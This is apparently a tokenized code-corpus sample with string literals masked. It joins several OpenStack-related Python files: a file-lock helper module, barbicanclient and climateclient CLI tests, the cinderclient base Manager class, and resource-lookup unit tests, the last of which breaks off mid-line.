"<STR_LIT>" ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( self . __class__ . __name__ , self . unique_name , <EOL> self . path ) <EOL> def _fl_helper ( cls , mod , * args , ** kwds ) : <EOL> warnings . warn ( "<STR_LIT>" % mod , <EOL> DeprecationWarning , stacklevel = <NUM_LIT:2> ) <EOL> if not isinstance ( args [ <NUM_LIT:0> ] , str ) : <EOL> args = args [ <NUM_LIT:1> : ] <EOL> if len ( args ) == <NUM_LIT:1> and not kwds : <EOL> kwds [ "<STR_LIT>" ] = True <EOL> return cls ( * args , ** kwds ) <EOL> def LinkFileLock ( * args , ** kwds ) : <EOL> """<STR_LIT>""" <EOL> from . import linklockfile <EOL> return _fl_helper ( linklockfile . LinkLockFile , "<STR_LIT>" , <EOL> * args , ** kwds ) <EOL> def MkdirFileLock ( * args , ** kwds ) : <EOL> """<STR_LIT>""" <EOL> from . import mkdirlockfile <EOL> return _fl_helper ( mkdirlockfile . MkdirLockFile , "<STR_LIT>" , <EOL> * args , ** kwds ) <EOL> def SQLiteFileLock ( * args , ** kwds ) : <EOL> """<STR_LIT>""" <EOL> from . import sqlitelockfile <EOL> return _fl_helper ( sqlitelockfile . 
SQLiteLockFile , "<STR_LIT>" , <EOL> * args , ** kwds ) <EOL> def locked ( path , timeout = None ) : <EOL> """<STR_LIT>""" <EOL> def decor ( func ) : <EOL> @ functools . wraps ( func ) <EOL> def wrapper ( * args , ** kwargs ) : <EOL> lock = FileLock ( path , timeout = timeout ) <EOL> lock . acquire ( ) <EOL> try : <EOL> return func ( * args , ** kwargs ) <EOL> finally : <EOL> lock . release ( ) <EOL> return wrapper <EOL> return decor <EOL> if hasattr ( os , "<STR_LIT>" ) : <EOL> from . import linklockfile as _llf <EOL> LockFile = _llf . LinkLockFile <EOL> else : <EOL> from . import mkdirlockfile as _mlf <EOL> LockFile = _mlf . MkdirLockFile <EOL> FileLock = LockFile </s>
<s> import six <EOL> from barbicanclient import client <EOL> from barbicanclient import barbican as barb <EOL> from barbicanclient . tests import keystone_client_fixtures <EOL> from barbicanclient . tests import test_client <EOL> from barbicanclient . barbican import Barbican <EOL> class WhenTestingBarbicanCLI ( test_client . BaseEntityResource ) : <EOL> def setUp ( self ) : <EOL> self . _setUp ( '<STR_LIT>' ) <EOL> self . captured_stdout = six . StringIO ( ) <EOL> self . captured_stderr = six . StringIO ( ) <EOL> self . barbican = Barbican ( <EOL> stdout = self . captured_stdout , <EOL> stderr = self . captured_stderr <EOL> ) <EOL> self . parser = self . barbican . build_option_parser ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def assert_client_raises ( self , args , message ) : <EOL> argv , remainder = self . parser . parse_known_args ( args . split ( ) ) <EOL> e = self . assertRaises ( <EOL> Exception , self . barbican . create_client , argv <EOL> ) <EOL> self . assertIn ( message , str ( e ) ) <EOL> def create_and_assert_client ( self , args ) : <EOL> argv , remainder = self . parser . parse_known_args ( args . split ( ) ) <EOL> client = self . barbican . create_client ( argv ) <EOL> self . assertIsNotNone ( client ) <EOL> return client <EOL> def test_should_show_usage_with_help_flag ( self ) : <EOL> e = self . assertRaises ( SystemExit , self . barbican . run , [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( <NUM_LIT:0> , e . code ) <EOL> self . assertIn ( '<STR_LIT>' , self . captured_stdout . getvalue ( ) ) <EOL> def test_should_show_usage_with_no_args ( self ) : <EOL> exit_code = self . barbican . run ( [ ] ) <EOL> self . assertEquals ( <NUM_LIT:1> , exit_code ) <EOL> self . assertIn ( '<STR_LIT>' , self . captured_stderr . getvalue ( ) ) <EOL> def test_should_error_if_noauth_and_authurl_both_specified ( self ) : <EOL> args = "<STR_LIT>" <EOL> message = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> self . 
assert_client_raises ( args , message ) <EOL> def _expect_error_with_invalid_noauth_args ( self , args ) : <EOL> expected_err_msg = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assert_client_raises ( args , expected_err_msg ) <EOL> def test_should_error_if_noauth_and_missing_endpoint_tenantid_args ( self ) : <EOL> self . _expect_error_with_invalid_noauth_args ( "<STR_LIT>" ) <EOL> self . _expect_error_with_invalid_noauth_args ( <EOL> "<STR_LIT>" ) <EOL> self . _expect_error_with_invalid_noauth_args ( <EOL> "<STR_LIT>" ) <EOL> self . _expect_error_with_invalid_noauth_args ( <EOL> "<STR_LIT>" ) <EOL> def test_should_succeed_if_noauth_with_valid_args_specified ( self ) : <EOL> args = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( self . endpoint , self . project_id ) <EOL> ) <EOL> list_secrets_url = '<STR_LIT>' . format ( self . endpoint ) <EOL> self . responses . get ( list_secrets_url , json = { "<STR_LIT>" : [ ] , "<STR_LIT>" : <NUM_LIT:0> } ) <EOL> client = self . create_and_assert_client ( args ) <EOL> secret_list = client . secrets . list ( ) <EOL> self . assertTrue ( self . responses . _adapter . called ) <EOL> self . assertEqual ( <NUM_LIT:1> , self . responses . _adapter . call_count ) <EOL> self . assertEqual ( [ ] , secret_list ) <EOL> def test_should_error_if_required_keystone_auth_arguments_are_missing ( <EOL> self ) : <EOL> expected_error_msg = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assert_client_raises ( <EOL> '<STR_LIT>' , <EOL> expected_error_msg ) <EOL> self . assert_client_raises ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> expected_error_msg <EOL> ) <EOL> def test_check_auth_arguments_v2 ( self ) : <EOL> args = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> argv , remainder = self . parser . parse_known_args ( args . split ( ) ) <EOL> api_version = argv . os_identity_api_version <EOL> barbican = Barbican ( ) <EOL> response = barbican . check_auth_arguments ( argv , api_version ) <EOL> self . 
assertEqual ( True , response ) <EOL> def test_should_fail_check_auth_arguments_v2 ( self ) : <EOL> args = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> message = '<STR_LIT>' <EOL> argv , remainder = self . parser . parse_known_args ( args . split ( ) ) <EOL> api_version = argv . os_identity_api_version <EOL> e = self . assertRaises ( <EOL> Exception , <EOL> self . barbican . check_auth_arguments , <EOL> argv , <EOL> api_version , <EOL> True <EOL> ) <EOL> self . assertIn ( message , str ( e ) ) <EOL> def test_should_fail_create_client_with_no_auth_url ( self ) : <EOL> args = '<STR_LIT>' <EOL> message = '<STR_LIT>' <EOL> argv , remainder = self . parser . parse_known_args ( args . split ( ) ) <EOL> e = self . assertRaises ( <EOL> Exception , self . barbican . create_client , argv <EOL> ) <EOL> self . assertIn ( message , str ( e ) ) <EOL> def test_should_fail_missing_credentials ( self ) : <EOL> message = '<STR_LIT>' <EOL> args = '<STR_LIT>' <EOL> argv , remainder = self . parser . parse_known_args ( args . split ( ) ) <EOL> e = self . assertRaises ( <EOL> Exception , self . barbican . create_client , argv <EOL> ) <EOL> self . assertIn ( message , str ( e ) ) <EOL> def test_main ( self ) : <EOL> args = '<STR_LIT>' <EOL> response = barb . main ( args ) <EOL> self . assertEqual ( <NUM_LIT:1> , response ) <EOL> def test_default_endpoint_filter_kwargs_set_correctly ( self ) : <EOL> auth_args = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> argv , remainder = self . parser . parse_known_args ( auth_args . split ( ) ) <EOL> barbican_client = self . barbican . create_client ( argv ) <EOL> httpclient = barbican_client . secrets . _api <EOL> self . assertEqual ( client . _DEFAULT_SERVICE_INTERFACE , <EOL> httpclient . interface ) <EOL> self . assertEqual ( client . _DEFAULT_SERVICE_TYPE , httpclient . service_type ) <EOL> self . assertEqual ( client . _DEFAULT_API_VERSION , httpclient . version ) <EOL> self . assertIsNone ( httpclient . 
service_name ) <EOL> def test_endpoint_filter_kwargs_set_correctly ( self ) : <EOL> from testtools . content import text_content <EOL> auth_args = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> endpoint_filter_args = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> args = auth_args + '<STR_LIT:U+0020>' + endpoint_filter_args <EOL> argv , remainder = self . parser . parse_known_args ( args . split ( ) ) <EOL> barbican_client = self . barbican . create_client ( argv ) <EOL> httpclient = barbican_client . secrets . _api <EOL> self . assertEqual ( '<STR_LIT>' , httpclient . interface ) <EOL> self . assertEqual ( '<STR_LIT>' , httpclient . service_type ) <EOL> self . assertEqual ( '<STR_LIT>' , httpclient . service_name ) <EOL> self . assertEqual ( '<STR_LIT>' , httpclient . region_name ) <EOL> self . assertEqual ( '<STR_LIT>' , httpclient . version ) <EOL> class TestBarbicanWithKeystonePasswordAuth ( <EOL> keystone_client_fixtures . KeystoneClientFixture ) : <EOL> def setUp ( self ) : <EOL> super ( TestBarbicanWithKeystonePasswordAuth , self ) . setUp ( ) <EOL> self . test_arguments = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> class TestBarbicanWithKeystoneTokenAuth ( <EOL> keystone_client_fixtures . KeystoneClientFixture ) : <EOL> def setUp ( self ) : <EOL> super ( TestBarbicanWithKeystoneTokenAuth , self ) . setUp ( ) <EOL> self . test_arguments = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } </s>
<s> from testtools import testcase <EOL> from functionaltests import utils <EOL> from functionaltests . client import base <EOL> from functionaltests . common import cleanup <EOL> order_create_key_data = { <EOL> "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } <EOL> order_create_nones_data = { <EOL> '<STR_LIT:type>' : None , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT:name>" : None , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : None , <EOL> } <EOL> } <EOL> @ utils . parameterized_test_case <EOL> class OrdersTestCase ( base . TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( OrdersTestCase , self ) . setUp ( ) <EOL> self . cleanup = cleanup . CleanUp ( self . barbicanclient ) <EOL> def tearDown ( self ) : <EOL> self . cleanup . delete_all_entities ( ) <EOL> super ( OrdersTestCase , self ) . tearDown ( ) <EOL> @ testcase . attr ( '<STR_LIT>' ) <EOL> def test_create_order_defaults ( self ) : <EOL> """<STR_LIT>""" <EOL> order = self . barbicanclient . orders . create_key ( <EOL> ** order_create_key_data ) <EOL> order_ref = self . cleanup . add_entity ( order ) <EOL> self . assertIsNotNone ( order_ref ) <EOL> @ testcase . attr ( '<STR_LIT>' ) <EOL> def test_get_order_defaults_metadata ( self ) : <EOL> """<STR_LIT>""" <EOL> order = self . barbicanclient . orders . create_key ( <EOL> ** order_create_key_data ) <EOL> order_ref = self . cleanup . add_entity ( order ) <EOL> self . assertIsNotNone ( order_ref ) <EOL> order_resp = self . barbicanclient . orders . get ( order_ref ) <EOL> self . assertTrue ( order_resp . status == "<STR_LIT>" or <EOL> order_resp . status == "<STR_LIT>" ) <EOL> self . assertEqual ( order . name , <EOL> order_resp . name ) <EOL> self . assertEqual ( order . mode , <EOL> order_resp . mode ) <EOL> self . assertEqual ( order . algorithm , <EOL> order_resp . 
algorithm ) <EOL> self . assertEqual ( order . bit_length , <EOL> order_resp . bit_length ) <EOL> self . assertEqual ( order . payload_content_type , <EOL> order_resp . payload_content_type ) <EOL> @ testcase . attr ( '<STR_LIT>' ) <EOL> def test_get_order_defaults ( self ) : <EOL> """<STR_LIT>""" <EOL> order = self . barbicanclient . orders . create_key ( <EOL> ** order_create_key_data ) <EOL> order_ref = self . cleanup . add_entity ( order ) <EOL> self . assertIsNotNone ( order_ref ) <EOL> order_resp = self . barbicanclient . orders . get ( order_ref ) <EOL> self . assertIsNotNone ( order_resp . order_ref ) <EOL> self . assertEqual ( '<STR_LIT:key>' , order_resp . _type ) <EOL> self . assertTrue ( order_resp . status == "<STR_LIT>" or <EOL> order_resp . status == "<STR_LIT>" ) <EOL> if order_resp . status == "<STR_LIT>" : <EOL> self . assertIsNotNone ( order_resp . secret_ref ) <EOL> @ testcase . attr ( '<STR_LIT>' ) <EOL> def test_delete_order_defaults ( self ) : <EOL> """<STR_LIT>""" <EOL> order = self . barbicanclient . orders . create_key ( <EOL> ** order_create_key_data ) <EOL> order_ref = order . submit ( ) <EOL> secret_ref = self . barbicanclient . orders . get ( order_ref ) . secret_ref <EOL> delete_resp = self . barbicanclient . orders . delete ( order_ref ) <EOL> self . assertIsNone ( delete_resp ) <EOL> self . barbicanclient . secrets . delete ( secret_ref ) <EOL> @ testcase . attr ( '<STR_LIT>' ) <EOL> def test_get_orders_defaults ( self ) : <EOL> """<STR_LIT>""" <EOL> limit = <NUM_LIT:7> <EOL> offset = <NUM_LIT:0> <EOL> total = <NUM_LIT:10> <EOL> for i in range ( <NUM_LIT:0> , total + <NUM_LIT:1> ) : <EOL> order = self . barbicanclient . orders . create_key ( <EOL> ** order_create_key_data ) <EOL> order_ref = self . cleanup . add_entity ( order ) <EOL> self . assertIsNotNone ( order_ref ) <EOL> orders_list = self . barbicanclient . orders . list ( limit = limit , <EOL> offset = offset ) <EOL> self . assertEqual ( limit , len ( orders_list ) ) </s>
<s> import re <EOL> import six <EOL> import sys <EOL> import fixtures <EOL> import testtools <EOL> from climateclient import shell <EOL> from climateclient import tests <EOL> FAKE_ENV = { '<STR_LIT>' : '<STR_LIT:username>' , <EOL> '<STR_LIT>' : '<STR_LIT:password>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> class ClimateShellTestCase ( tests . TestCase ) : <EOL> def make_env ( self , exclude = None , fake_env = FAKE_ENV ) : <EOL> env = dict ( ( k , v ) for k , v in fake_env . items ( ) if k != exclude ) <EOL> self . useFixture ( fixtures . MonkeyPatch ( '<STR_LIT>' , env ) ) <EOL> def setUp ( self ) : <EOL> super ( ClimateShellTestCase , self ) . setUp ( ) <EOL> self . climate_shell = shell . ClimateShell ( ) <EOL> def shell ( self , argstr , exitcodes = ( <NUM_LIT:0> , ) ) : <EOL> orig = sys . stdout <EOL> orig_stderr = sys . stderr <EOL> try : <EOL> sys . stdout = six . StringIO ( ) <EOL> sys . stderr = six . StringIO ( ) <EOL> _shell = shell . ClimateShell ( ) <EOL> _shell . initialize_app ( argstr . split ( ) ) <EOL> except SystemExit : <EOL> exc_type , exc_value , exc_traceback = sys . exc_info ( ) <EOL> self . assertIn ( exc_value . code , exitcodes ) <EOL> finally : <EOL> stdout = sys . stdout . getvalue ( ) <EOL> sys . stdout . close ( ) <EOL> sys . stdout = orig <EOL> stderr = sys . stderr . getvalue ( ) <EOL> sys . stderr . close ( ) <EOL> sys . stderr = orig_stderr <EOL> return ( stdout , stderr ) <EOL> def test_help_unknown_command ( self ) : <EOL> self . assertRaises ( ValueError , self . shell , '<STR_LIT>' ) <EOL> @ testtools . skip ( '<STR_LIT>' ) <EOL> def test_bash_completion ( self ) : <EOL> stdout , stderr = self . shell ( '<STR_LIT>' ) <EOL> required = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> for r in required : <EOL> self . assertThat ( ( stdout + stderr ) , <EOL> testtools . matchers . MatchesRegex ( <EOL> r , re . DOTALL | re . 
MULTILINE ) ) <EOL> @ testtools . skip ( '<STR_LIT>' ) <EOL> def test_authenticate_user ( self ) : <EOL> obj = shell . ClimateShell ( ) <EOL> obj . initialize_app ( '<STR_LIT>' ) <EOL> obj . options . os_token = '<STR_LIT>' <EOL> obj . options . os_cacert = '<STR_LIT>' <EOL> obj . authenticate_user ( ) </s>
<s> """<STR_LIT>""" <EOL> import abc <EOL> import contextlib <EOL> import hashlib <EOL> import os <EOL> import six <EOL> from six . moves . urllib import parse <EOL> from cinderclient import api_versions <EOL> from cinderclient import exceptions <EOL> from cinderclient . openstack . common . apiclient import base as common_base <EOL> from cinderclient import utils <EOL> SORT_DIR_VALUES = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> SORT_KEY_VALUES = ( '<STR_LIT:id>' , '<STR_LIT:status>' , '<STR_LIT:size>' , '<STR_LIT>' , '<STR_LIT:name>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> SORT_KEY_MAPPINGS = { '<STR_LIT:name>' : '<STR_LIT>' } <EOL> SORT_KEY_ADD_VALUES = { '<STR_LIT>' : ( '<STR_LIT>' , ) , } <EOL> Resource = common_base . Resource <EOL> def getid ( obj ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return obj . id <EOL> except AttributeError : <EOL> return obj <EOL> class Manager ( common_base . HookableMixin ) : <EOL> """<STR_LIT>""" <EOL> resource_class = None <EOL> def __init__ ( self , api ) : <EOL> self . _api_version = api_versions . APIVersion ( ) <EOL> self . api = api <EOL> @ property <EOL> def api_version ( self ) : <EOL> return self . _api_version <EOL> def _list ( self , url , response_key , obj_class = None , body = None , <EOL> limit = None , items = None ) : <EOL> resp = None <EOL> if items is None : <EOL> items = [ ] <EOL> if body : <EOL> resp , body = self . api . client . post ( url , body = body ) <EOL> else : <EOL> resp , body = self . api . client . get ( url ) <EOL> if obj_class is None : <EOL> obj_class = self . resource_class <EOL> data = body [ response_key ] <EOL> if isinstance ( data , dict ) : <EOL> try : <EOL> data = data [ '<STR_LIT>' ] <EOL> except KeyError : <EOL> pass <EOL> with self . completion_cache ( '<STR_LIT>' , obj_class , mode = "<STR_LIT:w>" ) : <EOL> with self . 
completion_cache ( '<STR_LIT>' , obj_class , mode = "<STR_LIT:w>" ) : <EOL> items_new = [ obj_class ( self , res , loaded = True ) <EOL> for res in data if res ] <EOL> if limit : <EOL> limit = int ( limit ) <EOL> margin = limit - len ( items ) <EOL> if margin <= len ( items_new ) : <EOL> items = items + items_new [ : margin ] <EOL> return common_base . ListWithMeta ( items , resp ) <EOL> else : <EOL> items = items + items_new <EOL> else : <EOL> items = items + items_new <EOL> next = None <EOL> if '<STR_LIT>' in body : <EOL> volumes_links = body [ '<STR_LIT>' ] <EOL> if volumes_links : <EOL> for volumes_link in volumes_links : <EOL> if '<STR_LIT>' in volumes_link and '<STR_LIT>' == volumes_link [ '<STR_LIT>' ] : <EOL> next = volumes_link [ '<STR_LIT>' ] <EOL> break <EOL> if next : <EOL> items = self . _list ( next , response_key , obj_class , None , <EOL> limit , items ) <EOL> return common_base . ListWithMeta ( items , resp ) <EOL> def _build_list_url ( self , resource_type , detailed = True , search_opts = None , <EOL> marker = None , limit = None , sort_key = None , sort_dir = None , <EOL> sort = None ) : <EOL> if search_opts is None : <EOL> search_opts = { } <EOL> query_params = { } <EOL> for key , val in search_opts . items ( ) : <EOL> if val : <EOL> query_params [ key ] = val <EOL> if marker : <EOL> query_params [ '<STR_LIT>' ] = marker <EOL> if limit : <EOL> query_params [ '<STR_LIT>' ] = limit <EOL> if sort : <EOL> query_params [ '<STR_LIT>' ] = self . _format_sort_param ( sort , <EOL> resource_type ) <EOL> else : <EOL> if sort_key : <EOL> query_params [ '<STR_LIT>' ] = self . _format_sort_key_param ( <EOL> sort_key , <EOL> resource_type ) <EOL> if sort_dir : <EOL> query_params [ '<STR_LIT>' ] = self . _format_sort_dir_param ( <EOL> sort_dir ) <EOL> query_string = "<STR_LIT>" <EOL> if query_params : <EOL> params = sorted ( query_params . items ( ) , key = lambda x : x [ <NUM_LIT:0> ] ) <EOL> query_string = "<STR_LIT>" % parse . 
urlencode ( params ) <EOL> detail = "<STR_LIT>" <EOL> if detailed : <EOL> detail = "<STR_LIT>" <EOL> return ( "<STR_LIT>" % <EOL> { "<STR_LIT>" : resource_type , "<STR_LIT>" : detail , <EOL> "<STR_LIT>" : query_string } ) <EOL> def _format_sort_param ( self , sort , resource_type = None ) : <EOL> '''<STR_LIT>''' <EOL> if not sort : <EOL> return None <EOL> if isinstance ( sort , six . string_types ) : <EOL> sort = [ s for s in sort . split ( '<STR_LIT:U+002C>' ) if s ] <EOL> sort_array = [ ] <EOL> for sort_item in sort : <EOL> if isinstance ( sort_item , tuple ) : <EOL> sort_key = sort_item [ <NUM_LIT:0> ] <EOL> sort_dir = sort_item [ <NUM_LIT:1> ] <EOL> else : <EOL> sort_key , _sep , sort_dir = sort_item . partition ( '<STR_LIT::>' ) <EOL> sort_key = sort_key . strip ( ) <EOL> sort_key = self . _format_sort_key_param ( sort_key , resource_type ) <EOL> if sort_dir : <EOL> sort_dir = sort_dir . strip ( ) <EOL> if sort_dir not in SORT_DIR_VALUES : <EOL> msg = ( '<STR_LIT>' <EOL> % '<STR_LIT:U+002CU+0020>' . join ( SORT_DIR_VALUES ) ) <EOL> raise ValueError ( msg ) <EOL> sort_array . append ( '<STR_LIT>' % ( sort_key , sort_dir ) ) <EOL> else : <EOL> sort_array . append ( sort_key ) <EOL> return '<STR_LIT:U+002C>' . join ( sort_array ) <EOL> def _format_sort_key_param ( self , sort_key , resource_type = None ) : <EOL> valid_sort_keys = SORT_KEY_VALUES <EOL> if resource_type : <EOL> add_sort_keys = SORT_KEY_ADD_VALUES . get ( resource_type , None ) <EOL> if add_sort_keys : <EOL> valid_sort_keys += add_sort_keys <EOL> if sort_key in valid_sort_keys : <EOL> return SORT_KEY_MAPPINGS . get ( sort_key , sort_key ) <EOL> msg = ( '<STR_LIT>' % <EOL> '<STR_LIT:U+002CU+0020>' . join ( valid_sort_keys ) ) <EOL> raise ValueError ( msg ) <EOL> def _format_sort_dir_param ( self , sort_dir ) : <EOL> if sort_dir in SORT_DIR_VALUES : <EOL> return sort_dir <EOL> msg = ( '<STR_LIT>' <EOL> % '<STR_LIT:U+002CU+0020>' . 
join ( SORT_DIR_VALUES ) ) <EOL> raise ValueError ( msg ) <EOL> @ contextlib . contextmanager <EOL> def completion_cache ( self , cache_type , obj_class , mode ) : <EOL> """<STR_LIT>""" <EOL> base_dir = utils . env ( '<STR_LIT>' , <EOL> default = "<STR_LIT>" ) <EOL> username = utils . env ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> url = utils . env ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> uniqifier = hashlib . md5 ( username . encode ( '<STR_LIT:utf-8>' ) + <EOL> url . encode ( '<STR_LIT:utf-8>' ) ) . hexdigest ( ) <EOL> cache_dir = os . path . expanduser ( os . path . join ( base_dir , uniqifier ) ) <EOL> try : <EOL> os . makedirs ( cache_dir , <NUM_LIT> ) <EOL> except OSError : <EOL> pass <EOL> resource = obj_class . __name__ . lower ( ) <EOL> filename = "<STR_LIT>" % ( resource , cache_type . replace ( '<STR_LIT:_>' , '<STR_LIT:->' ) ) <EOL> path = os . path . join ( cache_dir , filename ) <EOL> cache_attr = "<STR_LIT>" % cache_type <EOL> try : <EOL> setattr ( self , cache_attr , open ( path , mode ) ) <EOL> except IOError : <EOL> pass <EOL> try : <EOL> yield <EOL> finally : <EOL> cache = getattr ( self , cache_attr , None ) <EOL> if cache : <EOL> cache . close ( ) <EOL> delattr ( self , cache_attr ) <EOL> def write_to_completion_cache ( self , cache_type , val ) : <EOL> cache = getattr ( self , "<STR_LIT>" % cache_type , None ) <EOL> if cache : <EOL> cache . write ( "<STR_LIT>" % val ) <EOL> def _get ( self , url , response_key = None ) : <EOL> resp , body = self . api . client . get ( url ) <EOL> if response_key : <EOL> return self . resource_class ( self , body [ response_key ] , loaded = True , <EOL> resp = resp ) <EOL> else : <EOL> return self . resource_class ( self , body , loaded = True , resp = resp ) <EOL> def _create ( self , url , body , response_key , return_raw = False , ** kwargs ) : <EOL> self . run_hooks ( '<STR_LIT>' , body , ** kwargs ) <EOL> resp , body = self . api . client . post ( url , body = body ) <EOL> if return_raw : <EOL> return common_base . 
DictWithMeta ( body [ response_key ] , resp ) <EOL> with self . completion_cache ( '<STR_LIT>' , self . resource_class , mode = "<STR_LIT:a>" ) : <EOL> with self . completion_cache ( '<STR_LIT>' , self . resource_class , mode = "<STR_LIT:a>" ) : <EOL> return self . resource_class ( self , body [ response_key ] , resp = resp ) <EOL> def _delete ( self , url ) : <EOL> resp , body = self . api . client . delete ( url ) <EOL> return common_base . TupleWithMeta ( ( resp , body ) , resp ) <EOL> def _update ( self , url , body , response_key = None , ** kwargs ) : <EOL> self . run_hooks ( '<STR_LIT>' , body , ** kwargs ) <EOL> resp , body = self . api . client . put ( url , body = body ) <EOL> if response_key : <EOL> return self . resource_class ( self , body [ response_key ] , loaded = True , <EOL> resp = resp ) <EOL> body = body or { } <EOL> return common_base . DictWithMeta ( body , resp ) <EOL> class ManagerWithFind ( six . with_metaclass ( abc . ABCMeta , Manager ) ) : <EOL> """<STR_LIT>""" <EOL> @ abc . abstractmethod <EOL> def list ( self ) : <EOL> pass <EOL> def find ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> matches = self . findall ( ** kwargs ) <EOL> num_matches = len ( matches ) <EOL> if num_matches == <NUM_LIT:0> : <EOL> msg = "<STR_LIT>" % ( self . resource_class . __name__ , kwargs ) <EOL> raise exceptions . NotFound ( <NUM_LIT> , msg ) <EOL> elif num_matches > <NUM_LIT:1> : <EOL> raise exceptions . NoUniqueMatch <EOL> else : <EOL> matches [ <NUM_LIT:0> ] . append_request_ids ( matches . request_ids ) <EOL> return matches [ <NUM_LIT:0> ] <EOL> def findall ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> search_opts = { '<STR_LIT>' : <NUM_LIT:1> } <EOL> if '<STR_LIT:name>' in kwargs : <EOL> search_opts [ '<STR_LIT:name>' ] = kwargs [ '<STR_LIT:name>' ] <EOL> elif '<STR_LIT>' in kwargs : <EOL> search_opts [ '<STR_LIT>' ] = kwargs [ '<STR_LIT>' ] <EOL> found = common_base . ListWithMeta ( [ ] , None ) <EOL> searches = kwargs . 
items ( ) <EOL> listing = self . list ( search_opts = search_opts ) <EOL> found . append_request_ids ( listing . request_ids ) <EOL> for obj in listing : <EOL> try : <EOL> if all ( getattr ( obj , attr ) == value <EOL> for ( attr , value ) in searches ) : <EOL> found . append ( obj ) <EOL> except AttributeError : <EOL> continue <EOL> return found </s>
<s> import collections <EOL> import sys <EOL> import mock <EOL> from six import moves <EOL> from cinderclient import exceptions <EOL> from cinderclient import utils <EOL> from cinderclient import base <EOL> from cinderclient . openstack . common . apiclient import base as common_base <EOL> from cinderclient . tests . unit import utils as test_utils <EOL> from cinderclient . tests . unit . v2 import fakes <EOL> UUID = '<STR_LIT>' <EOL> class FakeResource ( object ) : <EOL> NAME_ATTR = '<STR_LIT:name>' <EOL> def __init__ ( self , _id , properties ) : <EOL> self . id = _id <EOL> try : <EOL> self . name = properties [ '<STR_LIT:name>' ] <EOL> except KeyError : <EOL> pass <EOL> def append_request_ids ( self , resp ) : <EOL> pass <EOL> class FakeManager ( base . ManagerWithFind ) : <EOL> resource_class = FakeResource <EOL> resources = [ <EOL> FakeResource ( '<STR_LIT>' , { '<STR_LIT:name>' : '<STR_LIT>' } ) , <EOL> FakeResource ( UUID , { '<STR_LIT:name>' : '<STR_LIT>' } ) , <EOL> FakeResource ( '<STR_LIT>' , { '<STR_LIT:name>' : '<STR_LIT>' } ) <EOL> ] <EOL> def get ( self , resource_id ) : <EOL> for resource in self . resources : <EOL> if resource . id == str ( resource_id ) : <EOL> return resource <EOL> raise exceptions . NotFound ( resource_id ) <EOL> def list ( self , search_opts ) : <EOL> return common_base . ListWithMeta ( self . resources , fakes . REQUEST_ID ) <EOL> class FakeDisplayResource ( object ) : <EOL> NAME_ATTR = '<STR_LIT>' <EOL> def __init__ ( self , _id , properties ) : <EOL> self . id = _id <EOL> try : <EOL> self . display_name = properties [ '<STR_LIT>' ] <EOL> except KeyError : <EOL> pass <EOL> def append_request_ids ( self , resp ) : <EOL> pass <EOL> class FakeDisplayManager ( FakeManager ) : <EOL> resource_class = FakeDisplayResource <EOL> resources = [ <EOL> FakeDisplayResource ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT>' } ) , <EOL> ] <EOL> class FindResourceTestCase ( test_utils . 
TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( FindResourceTestCase , self ) . setUp ( ) <EOL> self . manager = FakeManager ( None ) <EOL> def test_find_none ( self ) : <EOL> self . manager . find = mock . Mock ( side_effect = self . manager . find ) <EOL> self . assertRaises ( exceptions . CommandError , <EOL> utils . find_resource , <EOL> self . manager , <EOL> '<STR_LIT>' ) <EOL> self . assertEqual ( <NUM_LIT:2> , self . manager . find . call_count ) <EOL> def test_find_by_integer_id ( self ) : <EOL> output = utils . find_resource ( self . manager , <NUM_LIT> ) <EOL> self . assertEqual ( self . manager . get ( '<STR_LIT>' ) , output ) <EOL> def test_find_by_str_id ( self ) : <EOL> output = utils . find_resource ( self . manager , '<STR_LIT>' ) <EOL> self . assertEqual ( self . manager . get ( '<STR_LIT>' ) , output ) <EOL> def test_find_by_uuid ( self ) : <EOL> output = utils . find_resource ( self . manager , UUID ) <EOL> self . assertEqual ( self . manager . get ( UUID ) , output ) <EOL> def test_find_by_str_name ( self ) : <EOL> output = utils . find_resource ( self . manager , '<STR_LIT>' ) <EOL> self . assertEqual ( self . manager . get ( '<STR_LIT>' ) , output ) <EOL> def test_find_by_str_displayname ( self ) : <EOL> display_manager = FakeDisplayManager ( None ) <EOL> output = utils . find_resource ( display_manager , '<STR_LIT>' ) <EOL> self . assertEqual ( 